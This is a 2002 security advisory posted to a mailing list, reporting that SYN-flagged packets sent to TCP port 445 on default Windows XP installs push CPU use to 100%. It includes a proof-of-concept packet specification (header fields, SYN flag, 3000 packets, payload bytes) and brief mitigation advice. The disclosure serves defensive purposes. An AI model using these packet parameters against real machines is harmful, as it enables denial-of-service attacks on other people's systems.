Windows XP Remote DOS attacks with SYN Flag. Make CPU 100 %

From: Adonis.No.Spam (adonis1at_private)
Date: Fri Feb 15 2002 - 08:22:30 PST

                               .---------------.
                              / NtWaK0 Advisory \
    +-----------------------------------------------------------------------.
                                                                            :
    Affected         : Windows XP default install with TCP 445 open         :
    Type             : Remote DOS attacks with SYN Flag. Make CPU 100 %     :
    Date             : 15-02-2002                                           :
    Author           : NtWaK0 @ www.SafeHack.com                            :
    +-----------------------------------------------------------------------.
                                                                            :
    +----------------.
     Remote/Local DOS \
    +------------------`----------------------------------------------------.
                                                                            :
    +-----------.                                                           :
     Disclaimer  \                                                          :
    +-------------`---------------------------------------------------------.
    The information in this advisory is believed to be true based on        :
    experiments though it may be false. The opinions expressed in this      :
    advisory and program are my own and NOT of any company.                 :
    In Fact I do not work for no one at the present time.                   :
                                                                            :
    This material is presented for informational and entertainment purposes :
    only, and to satisfy the curious. Any activities described in this file :
    which involve vandalism, theft, or any other illegal activities are     :
    recounted from third-party conversations. I do not condone or encourage :
    vandalism or theft. I do not accept any liability for anything anyone   :
    does with this information. So, don't shoot the messenger.              :
    Remember: Use a computer in ways that ensure respect for your fellows.  :
                                                                            :
    +-------.                                                               :
     T.O.C.  \                                                              :
    +---------`-------------------------------------------------------------.
                                                                            :
                                                                            :
       [  Brief History . . . . . . . . . . . . . . . . . . . . . .line 45 ]:
                                                                            :
       [  The Problem . . . . . . . . . . . . . . . . . . . . . . .line 58 ]:
                                                                            :
       [  The Solution . . . . . . . . . . . . . . . . . . . . . .line 130 ]:
                                                                            :
    +-------------.                                                         :
     Brief History \                                                        :
    +---------------`-------------------------------------------------------.
    TCP/UPD port 445 is open by default on a Fresh installed XP box.        :
    The attack is seriouse since it work remotly and can make the CPU 100 % :
    in less then 20 Second.                                                 :
    To learn more about Windows XP please visit:                            :
    http://www.microsoft.com                                                :
                                                                            :
    YES YOUR HAVE GUESSED IT ENGLISH IS NOT MY MOTHER LANGUAGE -:)          :
    +---------------------------+                                           :
     >>> Test OS Applications <<<                                           :
    +---------------------------+                                           :
    Tested on Windows XP                                                    :
    Default Install with default ports                                      :
                                                                            :
    +-----------.                                                           :
     The Problem \                                                          :
    +-------------`---------------------------------------------------------.
    If an attacker target your Windows XP port 445 TCP with some special    :
    crafted packed [SYN Flag Set] they can cause 100 CPU % utilisation in   :
    less then 20 Second. The speed while sending the packet was 20 K upload :
    sometime less then 18 K [Based on DU-Meter]                             :
                                                                            :
    I have tried some other default port with a similar attack but the CPU  :
    utilistation was normal 9 % or 5 %.                                     :
                                                                            :
    The target machine is a windows XP with 240 RAM.                        :
                                                                            :
    I tried to send packets with other then SYN flag nothing happend. CPU OK:
    When I sent about 3000 packets NOT IN ONE SHOT... I was sending the     :
    packets one after the other, I noticed that CPU utilisation jumped 100% :
                                                                            :
    I could not do any TASK on the XP machine till I stoped sending packets.:
                                                                            :
    I can see this as a seriouse problem if you are using windows XP default:
                                                                            :
    Imagine someone is attacking your Windows XP from 1000 zombies. I am    :
    not sure if your Windows XP wont Crash.                                 :
                                                                            :
    Like I said I send couples of packets and the CPU jumped in less then   :
    20 Sec to 100 %. Soon I am going to do more tests to see what will      :
    happen if I send the same packets but for one hour time or more.        :
                                                                            :
                                                                            :
    +-----------------------------------------+                             :
    >>> Proof-Of-Concept-Packet-Information <<<                             :
    +-----------------------------------------+                             :
    [IP]                                                                    :
    SourceAddress=                                                          :
    SourcePort=1                                                            :
    DestinationAddress=                                                     :
    DestinationPort=445                                                     :
    HeaderSize=20                                                           :
    SpecifyHeaderSize=0                                                     :
    Identification=0                                                        :
    SpecifyIdentification=0                                                 :
    Checksum=0                                                              :
    SpecifyChecksum=0                                                       :
    TypeService=4                                                           :
    FragmentationType=2                                                     :
    DataSize=32                                                             :
    Offset=0                                                                :
    TTL=1                                                                   :
                                                                            :
    [Commands]                                                              :
    NbPackets=3000                                                          :
    PacketType=0                                                            :
                                                                            :
    [TCP]                                                                   :
    fURG=0                                                                  :
    fACK=0                                                                  :
    fPUSH=0                                                                 :
    fRESET=0                                                                :
    fSYN=1                                                                  :
    fFIN=0                                                                  :
    Acknowledge=0                                                           :
    Sequence=0                                                              :
    Window=0                                                                :
    Offset=0                                                                :
    Urgent=0                                                                :
    Checksum=0                                                              :
    SpecifyTCPChecksum=0                                                    :
    Data=xffxffxffxffxffxffxffxffxffffx00                                   :
                                                                            :
    ........................................................................:
    ........................................................................:
                                                                            :
    +------------.                                                          :
     The Solution \                                                         :
    +--------------`--------------------------------------------------------.
    Vendor should be informed...I guess Microsoft read Securityfocus too    :
    Filter 445 and other UNUSED ports. Stop Unused Services                 :
    +-----------------------------------------------------------------------.

    The only secure computer is one that's unplugged, locked in a safe,
    and buried 20 feet under the ground in a secret location... and i'm
    not even too sure about that one"--Dennis Huges, FBI.
    Live Well Do Good  www.SafeHack.com                         |
    Je Pense, Donc Je Suis                                    \(|)/
    I know I ain't perfect, but i'm 99 point 9 percent :)    --(")--
    RFCs are meant to be read and followed…:)                  /`\  NtWaK0
    Connect yourself to the main computer and let me take you to a
    cybernetic ride. Are you connected to the right cybernet? If you are,
    finally you are connected to my brain.
    -=- Use a computer in a ways that ensure respect for your fellow     -=-